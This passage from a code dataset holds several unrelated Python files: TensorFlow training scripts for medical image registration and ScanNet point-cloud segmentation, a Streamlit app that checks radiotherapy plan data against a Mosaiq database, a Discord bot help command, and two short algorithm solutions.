tf.layers.batch_normalization(conv3, training=bn_training)\n conv3 = tf.nn.relu(conv3)\n\n conv4 = tf.layers.conv3d(conv3, numberOfFeatures[i-1] , 1, padding=\"valid\", activation=None, name='convFullyConnected'+str(5))\n conv4 = tf.layers.batch_normalization(conv4, training=bn_training)\n conv4 = tf.nn.relu(conv4)\n\n yHat = tf.layers.conv3d(conv4, 3, 1, padding=\"valid\", activation=None)\n mse = (tf.losses.huber_loss(y, yHat, weights=1))\n\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learning_rate).minimize(mse)\n\n print('mse shape %s ' % (mse.get_shape()))\n print('y shape %s ' % (y.get_shape()))\n tf.summary.scalar(\"mse\", mseTrainAverage_net)\n\n summ = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(LOGDIR + '/train'+Exp, sess.graph)\n test_writer = tf.summary.FileWriter(LOGDIR + '/test' + Exp, sess.graph)\n # tf.global_variables_initializer().run() #Otherwise you encounter this error : Attempting to use uninitialized value conv2d/kerne\n print(' total numbe of variables %s' %(np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])))\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n\n # %%------------------------------------------- Setting of generating synthetic DVFs------------------------------------------\n Setting = {}\n Setting['DLFolder'] = '/srv/2-lkeb-16-reg1/hsokooti/DL/' # 'E:/PHD/Software/Project/DL/' or '/srv/2-lkeb-16-reg1/hsokooti/DL/'\n Setting['deformName'] = 'LungExp3D_2Teeeesssst' # 2D: 'LungExp2D_1' , 3D: 'LungExp3D_2'\n Setting['Dim'] = '3D' # '2D' or '3D'. Please note that in 2D setting, we still have a 3D DVF with zero values for the third direction\n Setting['DistanceDeform'] = 40 # The minimum distance between two random peaks\n Setting['DistanceArea'] = 20 # The area that is inculeded in the training algorithm\n Setting['sigmaNL'] = 1 # For adding noise for the next fixed image. This noise should be small otherwise we would ruin the SNR.\n Setting['Border'] = 33 # No peak would be in range of [0,Border) and [ImSize-Border, ImSize)\n Setting['sigmaN'] = 5 # Sigma for adding noise after deformation\n Setting['MaxDeform'] = [20, 15, 15] # The maximum amplitude of deformations\n Setting['sigmaB'] = [35, 25, 20] # For blurring deformaion peak\n Setting['Np'] = [100, 100, 100] # Number of random peaks\n\n # %%------------------------------------------------ Setting of reading DVFs ------------------------------------------------\n Setting['Resolution'] = 'multi' # 'single' or 'multi' resolution. In multiresolution, the downsampled patch is involved.\n Setting['deformMethod'] = [0, 1, 2] # 0: low freq, 1: medium freq, 2: high freq.\n Setting['classBalanced'] = [1.5, 4, 8] # Use these threshold values to balance the number of data in each category. for instance [a,b] implies classes [0,a), [a,b). Numbers are in mm\n Setting['K'] = 65 # Margin from the border to select random patches\n Setting['ParallelSearch'] = True # Using np.where in parallel with [number of cores - 2] in order to make balanced data. This is done with joblib library\n Setting['R'] = 14 # Radius of normal resolution patch size. Total size is (2*R +1)\n Setting['Rlow'] = 26 # Radius of low resolution patch size. Total size is (Rlow +1). Selected patch size: center-Rlow : center+Rlow : 2\n Setting['Ry'] = 0 # Radius of output. Total size is (2*Ry +1)\n Setting['verbose'] = True # Detailed printing\n\n # training\n INTrain = np.arange(1, 11) # Patients in the training set including fixed and moving images and several synthetic deformations of them\n numberOfImagesPerChunk = 5 # Number of images that I would like to load in RAM\n samplesPerImage = 10000\n batchSizeTrain = 50\n\n # validation\n INValidation = np.arange(11, 13) # Patients in the validation set including fixed and moving images and several synthetic deformations of them\n numberOfImagesPerChunkVal = 6 # Number of images that I would like to load in RAM\n samplesPerImageVal = 3000\n batchSizeVal = 500\n\n RegNetVal = RegNet.Patches(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunkVal, samplesPerImage=samplesPerImageVal, IN=INValidation, training=0)\n RegNetVal.fillList()\n RegNetTrainThread = RegNetThread.PatchesThread(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunk, samplesPerImage=samplesPerImage, IN=INTrain, training=1)\n RegNetTrainThread.start()\n while (not RegNetTrainThread._filled):\n time.sleep(2)\n RegNetTrain = RegNet.Patches(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunk, samplesPerImage=samplesPerImage, IN=INTrain, training=1)\n RegNetTrain.copyFromThread(RegNetTrainThread)\n chunks_completed = False\n RegNetTrainThread._filled = 0\n ThreadIsFilling = False\n mseTrainAverage = 0\n count = 1\n\n for itr in range(0,max_steps):\n if RegNetTrainThread._filled:\n ThreadIsFilling = False\n if (chunks_completed):\n if not RegNetTrainThread._filled:\n print ('Training the network is faster than reading the data ..... please wait .....')\n while (not RegNetTrainThread._filled):\n time.sleep(2)\n else:\n print('Training the network is slower than reading the data :-) ')\n RegNetTrain = RegNet.Patches(setting=Setting, numberOfImagesPerChunk=numberOfImagesPerChunk, samplesPerImage=samplesPerImage, IN=INTrain, training=1)\n RegNetTrain.copyFromThread(RegNetTrainThread)\n RegNetTrainThread._filled = 0\n chunks_completed = False\n ThreadIsFilling = False\n\n if (not RegNetTrainThread._filled) and (not ThreadIsFilling):\n RegNetTrainThread.goToNextChunk()\n RegNetTrainThread.resume()\n ThreadIsFilling = True\n\n batchX, batchY , batchXLow= RegNetTrain.next_batch(batchSizeTrain)\n if RegNetTrain._chunks_completed:\n print('chunk is completed')\n chunks_completed = True\n batchX = (batchX + 1000) / 4095.\n batchXLow = (batchXLow + 1000) / 4095.\n [mseTrainSample, _] = sess.run([mse,train_step], feed_dict={x: batchX, y: batchY, xLow: batchXLow, bn_training: 1, mseTrainAverage_net : mseTrainAverage})\n mseTrainAverage = mseTrainAverage + mseTrainSample\n count = count + 1\n if itr % 25 == 1:\n mseTrainAverage = mseTrainAverage/count\n [train_mse, s, y_dirX_temp, yHat_dirX_temp] = sess.run([mse, summ, y, yHat], feed_dict={x: batchX, y: batchY, xLow: batchXLow, bn_training: 0 , mseTrainAverage_net : mseTrainAverage})\n train_writer.add_summary(s, itr*batchSizeTrain)\n print('Train MSE at Epoch %s itr %s : %s time%s' % (RegNetTrain._semiEpoch, itr, mseTrainAverage, 2))\n mseTrainAverage = 0 ; count = 1\n if itr % 200 == 1:\n hi = 1\n # plt.figure(figsize=(22, 12))\n # y_dirX_temp = y_dirX_temp.flatten()\n # yHat_dirX_temp = yHat_dirX_temp.flatten()\n # sort_indices = np.argsort(y_dirX_temp)\n # plt.plot(y_dirX_temp[sort_indices], label='out train dir' + str(itr*batchSizeTrain))\n # plt.plot(yHat_dirX_temp[sort_indices], label='targets dir' + str(itr*batchSizeTrain))\n # plt.legend(bbox_to_anchor=(1., .8))\n # plt.ylim((-15, 15))\n # plt.draw()\n # plt.savefig(LOGDIR + 'train' + Exp + '/Model/' + 'y_train_dir' + str(itr*batchSizeTrain) + '_epoch.png')\n # plt.close()\n\n RegNetVal.resetValidation()\n mseValAverage = 0\n countVal = 1\n if itr % 1000 == 1:\n while not RegNetVal._chunks_completed:\n batchXTest, batchYTest , batchXLowTest = RegNetVal.next_batch(batchSizeVal)\n batchXTest = (batchXTest + 1000) / 4095.\n batchXLowTest = (batchXLowTest + 1000) / 4095.\n [mseValSample, s, y_dirX_temp, yHat_dirX_temp] = sess.run([mse, summ, y, yHat], feed_dict={x: batchXTest, y: batchYTest, xLow: batchXLowTest, bn_training: 0, mseTrainAverage_net : mseValAverage})\n mseValAverage = mseValAverage + mseValSample\n countVal = countVal + 1\n mseValAverage = mseValAverage / countVal\n [s] = sess.run([ summ], feed_dict={ x: batchXTest, y: batchYTest, xLow: batchXLowTest, bn_training: 1, mseTrainAverage_net : mseValAverage})\n test_writer.add_summary(s, itr*batchSizeTrain)\n\n\ndef main():\n learning_rate = 1E-3\n max_steps = np.array(1E7).astype(np.int64)\n RegNet_model(learning_rate = learning_rate , max_steps = max_steps)\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"submodules/RegNet/RegNet3D_MICCAI.py","file_name":"RegNet3D_MICCAI.py","file_ext":"py","file_size_in_byte":13886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"142038111","text":"import os\n\nimport streamlit as st\n\nfrom compare import color_results, compare_to_mosaiq\nfrom helpers import get_all_dicom_treatment_info\nfrom pymedphys._mosaiq import connect\nfrom pymedphys._mosaiq.helpers import get_all_treatment_data, get_staff_initials\nfrom tolerance_constants import SITE_CONSTANTS, TOLERANCE_TYPES\n\n\ncurrdir = os.getcwd()\nserver = \"PRDMOSAIQIWVV01.utmsa.local\"\n\nst.title(\"Data Transfer Check\")\nst.sidebar.header(\"Instructions:\")\nst.sidebar.markdown(\n \"\"\"\nTo use this application, you must have the RP file of the plan you want to check. This can be exported in Pinnacle.\nYou will get an error if you select a QA RP file.\n\nWhen exporting the DICOM, only the RP is needed. Once you have that, you can select it where prompted and the application\nwill run.\n\"\"\"\n)\ndicomFile = st.file_uploader(\"Please select a RP file.\", force=True)\n\nif dicomFile is not None:\n # retrieve data from both systems.\n dicom_table = get_all_dicom_treatment_info(dicomFile)\n dicom_table[\"tolerance\"] = [\n TOLERANCE_TYPES[item] for item in dicom_table[\"tolerance\"]\n ]\n dicom_table = dicom_table.sort_values([\"field_label\"])\n\n mrn = dicom_table.iloc[0][\"mrn\"]\n with connect.connect(server) as connection:\n mosaiq_table = get_all_treatment_data(connection, mrn)\n if mosaiq_table.iloc[0][\"create_id\"] is not None:\n try:\n site_initials = get_staff_initials(\n connection, str(mosaiq_table.iloc[0][\"create_id\"])\n )\n except:\n site_initials = \"\"\n\n # mosaiq_table = mosaiq_table[mosaiq_table[\"field_version\"] == 0]\n mosaiq_table = mosaiq_table[\n (mosaiq_table[\"site_version\"] == 0)\n & (mosaiq_table[\"site_setup_version\"] == 0)\n & (mosaiq_table[\"field_version\"] == 0)\n ]\n mosaiq_table = mosaiq_table.reset_index(drop=True)\n mosaiq_table[\"tolerance\"] = [\n TOLERANCE_TYPES[item] for item in mosaiq_table[\"tolerance\"]\n ]\n ########################################################################################################################\n # verify general patient information between the two systems\n name = dicom_table.iloc[0][\"first_name\"] + \" \" + dicom_table.iloc[0][\"last_name\"]\n st.subheader(\"Patient:\")\n\n if (\n name\n == mosaiq_table.iloc[0][\"first_name\"] + \" \" + mosaiq_table.iloc[0][\"last_name\"]\n ):\n st.success(\"Name: \" + name)\n else:\n st.error(\"Name: \" + name)\n\n if mrn == mosaiq_table.iloc[0][\"mrn\"]:\n st.success(\"MRN: \" + mrn)\n else:\n st.error(\"MRN: \" + mrn)\n\n DOB = str(mosaiq_table.iloc[0][\"dob\"])[0:10]\n dicom_DOB = dicom_table.iloc[0][\"dob\"]\n if DOB == dicom_DOB[0:4] + \"-\" + dicom_DOB[4:6] + \"-\" + dicom_DOB[6:8]:\n st.success(\"DOB: \" + DOB)\n else:\n st.error(\"DOB: \" + DOB)\n\n ########################################################################################################################\n # check the approval status of various sections in Mosaiq\n st.subheader(\"Approval Status:\")\n\n # check site setup approval\n if all(i == 5 for i in mosaiq_table.iloc[:][\"site_setup_status\"]):\n st.success(\"Site Setup Approved\")\n else:\n for i in mosaiq_table.iloc[:][\"site_setup_status\"]:\n if i != 5:\n st.error(\"Site Setup \" + SITE_CONSTANTS[i])\n break\n\n # check site approval\n if all(i == 5 for i in mosaiq_table.iloc[:][\"site_status\"]):\n st.success(\"RX Approved by \" + str(site_initials[0][0]))\n else:\n st.error(\"RX Approval Pending\")\n ########################################################################################################################\n # create a list of all the fields in the DICOM RP file\n index = []\n for j in dicom_table.iloc[:][\"field_label\"]:\n for i in range(len(mosaiq_table)):\n if mosaiq_table.iloc[i][\"field_label\"] == j:\n index.append(i)\n # remove any fields in Mosaiq that are not being compared to this particular RP file\n remove = []\n for i in mosaiq_table.iloc[:].index:\n if i not in index:\n remove.append(i)\n\n mosaiq_table = mosaiq_table.drop(remove)\n mosaiq_table = mosaiq_table.sort_index(axis=1)\n mosaiq_table = mosaiq_table.sort_values(by=[\"field_label\"])\n\n # compare values between the two systems and create a new dataframe with the results\n results = compare_to_mosaiq(dicom_table, mosaiq_table)\n results = results.transpose()\n\n # create a dropdown menu of prescriptions in mosaiq to choose from\n rx_selection = st.radio(\"Select RX: \", mosaiq_table.site.unique())\n rx_fields = mosaiq_table[mosaiq_table[\"site\"] == rx_selection][\"field_name\"].values\n\n # create a drop down menu to select fields to compare, only fields within selected rx appear as choices\n field_selection = st.radio(\"Select field to compare:\", rx_fields)\n st.subheader(\"Comparison\")\n\n if len(field_selection) is not 0:\n dicom_field = str(field_selection) + \"_DICOM\"\n mosaiq_field = str(field_selection) + \"_MOSAIQ\"\n st.write(\"**RX**: \", results[field_selection + \"_DICOM\"][\"rx\"])\n\n try:\n field_approval_id = mosaiq_table[\n mosaiq_table[\"field_name\"] == field_selection\n ][\"field_approval\"]\n with connect.connect(server) as connection:\n field_approval_initials = get_staff_initials(\n connection, str(int(field_approval_id.iloc[0]))\n )\n st.write(\"**Field Approved by: **\", field_approval_initials[0][0])\n except:\n st.write(\"This field is not approved.\")\n\n display_results = results[[dicom_field, mosaiq_field]]\n display_results = display_results.drop(\n [\"dob\", \"first_name\", \"last_name\", \"mrn\"], axis=0\n )\n display_results = display_results.style.apply(color_results, axis=1)\n st.dataframe(display_results, height=1000)\n\n fx_pattern = mosaiq_table[mosaiq_table[\"field_name\"] == field_selection][\n \"fraction_pattern\"\n ]\n st.write(\"**FX Pattern**: \", fx_pattern.iloc[0])\n\n comments = mosaiq_table[mosaiq_table[\"field_name\"] == field_selection][\"notes\"]\n st.write(\"**Comments**: \", comments.iloc[0])\n\n show_dicom = st.checkbox(\"View complete DICOM table.\")\n if show_dicom:\n st.subheader(\"DICOM Table\")\n st.dataframe(dicom_table, height=1000)\n\n show_mosaiq = st.checkbox(\"View complete Mosaiq table.\")\n if show_mosaiq:\n st.subheader(\"Mosaiq Table\")\n st.dataframe(mosaiq_table, height=1000)\n","sub_path":"site-specific/mays/streamlit_check.py","file_name":"streamlit_check.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"220020787","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThe MIT License (MIT)\nCopyright (c) 2018-2019 laggycomputer\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport discord\nfrom discord.ext import commands\n\nfrom .utils import Embedinator\n\n\nclass HelpCommand(commands.HelpCommand):\n def __init__(self):\n super().__init__()\n self.color = 0xf92f2f\n\n def command_not_found(self, string):\n return f\"Command or category `{self.context.prefix}{string}` not found. Try again...\"\n\n def subcommand_not_found(self, command, string):\n if isinstance(command, commands.Group) and len(command.all_commands) > 0:\n return f\"Command `{self.context.prefix}{command.qualified_name}` has no subcommand named {string}\"\n else:\n return f\"Command `{self.context.prefix}{command.qualified_name}` has no subcommands.\"\n\n @staticmethod\n def get_command_name(command):\n name = command.name\n if any(command.aliases):\n alist = []\n for alias in command.aliases:\n alist.append(\"`%s`\" % alias)\n name = f\"{name}, {', '.join(alist)}\"\n\n name = f\"{name} {command.signature}\"\n return name\n\n def create_embed(self):\n embed = discord.Embed(colour=self.color)\n embed.set_author(\n name=self.context.bot.user.name,\n icon_url=self.context.bot.user.avatar_url\n )\n embed.set_thumbnail(url=self.context.bot.user.avatar_url)\n embed.set_footer(\n text=f\"{self.context.bot.description} Requested by {self.context.author}\",\n icon_url=self.context.author.avatar_url\n )\n\n return embed\n\n def create_embedinator(self, **kwargs):\n destination = self.get_destination()\n embedinator = Embedinator(\n self.context.bot,\n destination,\n self.context.author,\n color=self.color,\n **kwargs\n )\n\n embedinator.set_author(\n name=self.context.bot.user.name,\n icon_url=self.context.bot.user.avatar_url\n )\n embedinator.set_thumbnail(url=self.context.bot.user.avatar_url)\n embedinator.base_embed.set_footer(\n text=f\"{self.context.bot.description} Requested by {self.context.author}\",\n icon_url=self.context.author.avatar_url\n )\n\n return embedinator\n\n async def send_command_help(self, command):\n embed = self.create_embed()\n embed.title = self.get_command_name(command)\n embed.description = command.short_doc or \"No description\"\n embed.set_footer(text=f\"Category: {command.cog_name}\")\n\n destination = self.get_destination()\n sent = (await destination.send(embed=embed))\n await self.context.bot.register_response(sent, self.context.message)\n\n async def send_group_help(self, group):\n embedinator = self.create_embedinator(\n title=self.get_commands(group),\n description=group.short_doc or \"No description\",\n max_fields=4\n )\n\n filtered = await self.filter_commands(group.commands)\n\n if filtered:\n for command in filtered:\n self.add_command_field(embedinator, command)\n\n sent = (await embedinator.send())\n await self.context.bot.register_response(sent, self.context.message)\n\n await embedinator.handle()\n\n async def send_cog_help(self, cog):\n embedinator = self.create_embedinator(\n title=cog.qualified_name,\n description=cog.description or \"No description\",\n max_fields=4\n )\n\n filtered = await self.filter_commands(cog.get_commands())\n\n if filtered:\n for command in filtered:\n self.add_command_field(embedinator, command)\n\n sent = (await embedinator.send())\n await self.context.bot.register_response(sent, self.context.message)\n\n await embedinator.handle()\n\n async def send_bot_help(self, mapping):\n embedinator = self.create_embedinator(\n title=\"General help\",\n description=self.get_opening_note(),\n max_fields=4\n )\n\n for cog, cog_commands in mapping.items():\n for command in cog_commands:\n self.add_command_field(embedinator, command)\n\n sent = (await embedinator.send())\n await self.context.bot.register_response(sent, self.context.message)\n\n await embedinator.handle()\n\n def add_command_field(self, embedinator, command):\n name = self.get_command_name(command)\n embedinator.add_field(name=name, value=command.short_doc, inline=False)\n\n def get_opening_note(self):\n command_name = self.context.invoked_with\n return f\"Use `{self.context.prefix}{command_name} ` or `{self.context.prefix}{command_name}\"\\\n \" ` for more info on a command or category.\"\n\n\nclass Help(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.original_help_command = bot.help_command\n bot.help_command = HelpCommand()\n bot.help_command.cog = self\n self.bot.get_command('help').hidden = True\n\n def cog_unload(self):\n self.bot.help_command = self.original_help_command\n\n\ndef setup(bot):\n bot.add_cog(Help(bot))\n","sub_path":"suprkewl-bot/ext/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"491977183","text":"class Solution:\n def oneEditAway(self, first: str, second: str) -> bool:\n fl, sl = len(first), len(second)\n if abs(fl - sl) >= 2:\n return False\n for i in range(min(fl, sl)):\n if first[i] == second[i]:\n continue\n else:\n return first[i:] == second[i+1:] or first[i+1:] == second[i:] or \\\n first[i+1:] == second[i+1:]\n return True\n","sub_path":"v6/01_05_oneEditAway.py","file_name":"01_05_oneEditAway.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41876744","text":"class Solution(object):\n def matrixReshape(self, nums, r, c):\n \"\"\"\n :type nums: List[List[int]]\n :type r: int\n :type c: int\n :rtype: List[List[int]]\n \"\"\"\n array = []\n for x in nums:\n for y in x:\n array.append(y)\n result = []\n for x in range(r):\n result.append([])\n slot = 0\n for x in range(r):\n for y in range(c):\n if slot >= len(array):\n return nums\n result[x].append(array[slot])\n slot += 1\n return result","sub_path":"reshape-the-matrix/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"149519","text":"import argparse\nimport time\nfrom datetime import datetime\nimport numpy as np\nimport tensorflow as tf\nimport socket\nimport importlib\nimport os\nimport sys\n\nbaseDir = os.path.dirname(os.path.abspath(__file__))\nrootDir = os.path.dirname(baseDir)\nsys.path.append(baseDir)\nsys.path.append(os.path.join(rootDir, 'models'))\nsys.path.append(os.path.join(rootDir, 'utils'))\nimport data_util\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')\nparser.add_argument('--model', default='SegGCN_scannet', help='Model name [default: SegGCN_scannet]')\nparser.add_argument('--config', default='scannet_config_SegGCN', help='Model name [default: scannet_config_SegGCN]')\nparser.add_argument('--log_dir', default='log_scannet', help='Log dir [default: log_scannet]')\nparser.add_argument('--load_ckpt', '-l', help='Path to a check point file for load')\nparser.add_argument('--max_epoch', type=int, default=501, help='Epoch to run [default: 501]')\nparser.add_argument('--batch_size', type=int, default=16, help='Batch Size during training [default: 16]')\nparser.add_argument('--learning_rate', type=float, default=0.001, help='Initial learning rate [default: 0.001]')\nparser.add_argument('--momentum', type=float, default=0.9, help='Initial learning rate [default: 0.9]')\nparser.add_argument('--optimizer', default='adam', help='adam or momentum [default: adam]')\nparser.add_argument('--decay_step', type=int, default=500000, help='Decay step for lr decay [default: 1000000]')\nparser.add_argument('--decay_rate', type=float, default=0.7, help='Decay rate for lr decay [default: 0.7]')\nFLAGS = parser.parse_args()\n\nBATCH_SIZE = FLAGS.batch_size\nMAX_EPOCH = FLAGS.max_epoch\nBASE_LEARNING_RATE = FLAGS.learning_rate\nGPU_INDEX = FLAGS.gpu\nMOMENTUM = FLAGS.momentum\nOPTIMIZER = FLAGS.optimizer\nDECAY_STEP = FLAGS.decay_step\nDECAY_RATE = FLAGS.decay_rate\n\nMODEL = importlib.import_module(FLAGS.model) # import network module\nMODEL_FILE = os.path.join(rootDir, 'models', FLAGS.model+'.py')\nLOG_DIR = os.path.join(rootDir, FLAGS.log_dir)\nif not os.path.exists(LOG_DIR): os.mkdir(LOG_DIR)\nos.system('cp %s %s' % (MODEL_FILE, LOG_DIR)) # bkp of model def\nos.system('cp train_scannet.py %s' % (LOG_DIR)) # bkp of train procedure\nos.system('cp %s.py %s' % (FLAGS.config, LOG_DIR)) # bkp of train procedure\nLOG_FOUT = open(os.path.join(LOG_DIR, 'log_train.txt'), 'a')\nLOG_FOUT.write(str(FLAGS)+'\\n')\n\nHOSTNAME = socket.gethostname()\n\nnet_config = importlib.import_module(FLAGS.config)\nNUM_POINT = net_config.num_input\nNUM_CLASSES = net_config.num_cls\nINPUT_DIM = 6\n\ndataDir = '/media/huanlei/Data/PycharmProjects/SPH3D-GCN/data/scannet-3cm'\ntrainlist = [line.rstrip() for line in open(os.path.join(dataDir, 'train_val_files.txt'))]\nvallist = [line.rstrip() for line in open(os.path.join(dataDir, 'val_files.txt'))]\n\n\nclasses = {'other20':0,'wall':1,'floor':2,'cabinet':3,'bed':4,'chair':5,\\\n 'sofa':6,'table':7,'door':8,'window':9,'bookshelf':10,\\\n 'picture':11,'counter':12,'desk':13,'curtain':14,'refridgerator':15,\\\n 'shower curtain':16,'toilet':17,'sink':18,'bathtub':19,'otherfurniture':20}\n\n\ndef log_string(out_str):\n LOG_FOUT.write(out_str+'\\n')\n LOG_FOUT.flush()\n print(out_str)\n\n\ndef get_learning_rate(batch):\n learning_rate = tf.train.exponential_decay(\n BASE_LEARNING_RATE, # Base learning rate.\n batch * BATCH_SIZE, # Current index into the dataset.\n DECAY_STEP, # Decay step.\n DECAY_RATE, # Decay rate.\n staircase=True)\n learning_rate = tf.maximum(learning_rate, 0.000001) # CLIP THE LEARNING RATE!\n return learning_rate\n\n\ndef placeholder_inputs(batch_size, num_point):\n input_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, INPUT_DIM))\n label_pl = tf.placeholder(tf.int32, shape=(batch_size, num_point))\n inner_label_pl = tf.placeholder(tf.int32, shape=(batch_size, num_point))\n\n return input_pl, label_pl, inner_label_pl\n\n\ndef augment_fn(batch_input, batch_label, batch_inner):\n bsize, num_point, _ = batch_input.shape\n\n # shuffle the orders of samples in a batch\n idx = np.arange(bsize)\n np.random.shuffle(idx)\n batch_input = batch_input[idx,:,:]\n batch_label = batch_label[idx,:]\n batch_inner = batch_inner[idx,:]\n\n # shuffle the point orders of each sample\n idx = np.arange(num_point)\n np.random.shuffle(idx)\n batch_input = batch_input[:,idx,:]\n batch_label = batch_label[:,idx]\n batch_inner = batch_inner[:,idx]\n\n # perform augmentation on the first np.int32(augment_ratio*bsize) samples\n augSize = np.int32(1/3.0 * bsize)\n augment_xyz = batch_input[0:augSize,:,0:3]\n augment_xyz = data_util.rotate_point_cloud(augment_xyz)\n augment_xyz = data_util.rotate_perturbation_point_cloud(augment_xyz)\n augment_xyz = data_util.random_scale_point_cloud(augment_xyz)\n augment_xyz = data_util.shift_point_cloud(augment_xyz)\n augment_xyz = data_util.jitter_point_cloud(augment_xyz)\n batch_input[0:augSize,:,0:3] = augment_xyz\n\n augment_xyz = batch_input[augSize:2*augSize,:,0:3]\n augment_xyz = data_util.rotate_perturbation_point_cloud(augment_xyz)\n augment_xyz = data_util.random_scale_point_cloud(augment_xyz)\n augment_xyz = data_util.shift_point_cloud(augment_xyz)\n augment_xyz = data_util.jitter_point_cloud(augment_xyz)\n batch_input[augSize:2*augSize,:,0:3] = augment_xyz\n\n return batch_input, batch_label, batch_inner\n\n\ndef parse_fn(item):\n features = tf.parse_single_example(\n item,\n features={\n 'xyz_raw': tf.FixedLenFeature([], dtype=tf.string),\n 'rgb_raw': tf.FixedLenFeature([], dtype=tf.string),\n 'seg_label':tf.FixedLenFeature([], dtype=tf.string),\n 'inner_label':tf.FixedLenFeature([], dtype=tf.string)})\n\n xyz = tf.decode_raw(features['xyz_raw'], tf.float32)\n rgb = tf.decode_raw(features['rgb_raw'], tf.float32)\n seg_label = tf.decode_raw(features['seg_label'], tf.int32)\n inner_label = tf.decode_raw(features['inner_label'], tf.int32)\n\n xyz = tf.reshape(xyz, [-1, 3])\n rgb = tf.reshape(rgb, [-1, 3])\n seg_label = tf.reshape(seg_label, [-1, 1])\n inner_label = tf.reshape(inner_label, [-1, 1])\n all_in_one = tf.concat((xyz, rgb, tf.cast(seg_label,tf.float32),\n tf.cast(inner_label,tf.float32)), axis=-1)\n\n return all_in_one\n\n\ndef input_fn(filelist, batch_size=16, buffer_size=10000):\n dataset = tf.data.TFRecordDataset(filelist)\n dataset = dataset.shuffle(buffer_size=buffer_size)\n dataset = dataset.map(parse_fn, num_parallel_calls=4)\n dataset = dataset.padded_batch(batch_size, padded_shapes=(None,INPUT_DIM+2),\n padding_values=-1.0, drop_remainder=False)\n\n return dataset\n\n\ndef train():\n # ===============================Prepare the Dataset===============================\n trainset = input_fn(trainlist, BATCH_SIZE, 10000)\n train_iterator = trainset.make_initializable_iterator()\n next_train_element = train_iterator.get_next()\n\n testset = input_fn(vallist, BATCH_SIZE, 10000)\n test_iterator = testset.make_initializable_iterator()\n next_test_element = test_iterator.get_next()\n # =====================================The End=====================================\n\n with tf.device('/gpu:0'):\n # =================================Define the Graph================================\n input_pl, label_pl, inner_label_pl = placeholder_inputs(BATCH_SIZE, NUM_POINT)\n\n training_pl = tf.placeholder(tf.bool, shape=())\n global_step = tf.Variable(0, trainable=False, name='global_step')\n\n # Get model and loss\n pred, end_points = MODEL.get_model(input_pl, training_pl, config=net_config)\n MODEL.get_loss(pred, label_pl, end_points, inner_label_pl)\n if net_config.weight_decay is not None:\n reg_loss = tf.multiply(tf.losses.get_regularization_loss(), net_config.weight_decay, name='reg_loss')\n tf.add_to_collection('losses', reg_loss)\n losses = tf.get_collection('losses')\n total_loss = tf.add_n(losses, name='total_loss')\n tf.summary.scalar('total_loss', total_loss)\n for l in losses + [total_loss]:\n tf.summary.scalar(l.op.name, l)\n\n correct = tf.equal(tf.argmax(pred, 2, output_type=tf.int32), tf.cast(label_pl,tf.int32))\n accuracy = tf.reduce_sum(tf.cast(correct, tf.float32)) / float(BATCH_SIZE)\n tf.summary.scalar('accuracy', accuracy)\n\n print(\"--- Get training operator\")\n # Get training operator\n learning_rate = tf.constant(FLAGS.learning_rate) #get_learning_rate(global_step)\n tf.summary.scalar('learning_rate', learning_rate)\n if OPTIMIZER == 'momentum':\n optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=MOMENTUM, use_nesterov=True)\n elif OPTIMIZER == 'adam':\n optimizer = tf.train.AdamOptimizer(learning_rate, epsilon=1e-4)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(total_loss, global_step=global_step)\n\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver(max_to_keep=500)\n # =====================================The End=====================================\n\n n = len([n.name for n in tf.get_default_graph().as_graph_def().node])\n print(\"*****************The Graph has %d nodes*****************\"%(n))\n\n # =================================Start a Session================================\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n config.log_device_placement = False\n\n init = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n\n with tf.Session(config=config) as sess:\n # Add summary writers\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(os.path.join(LOG_DIR, 'train'), sess.graph)\n test_writer = 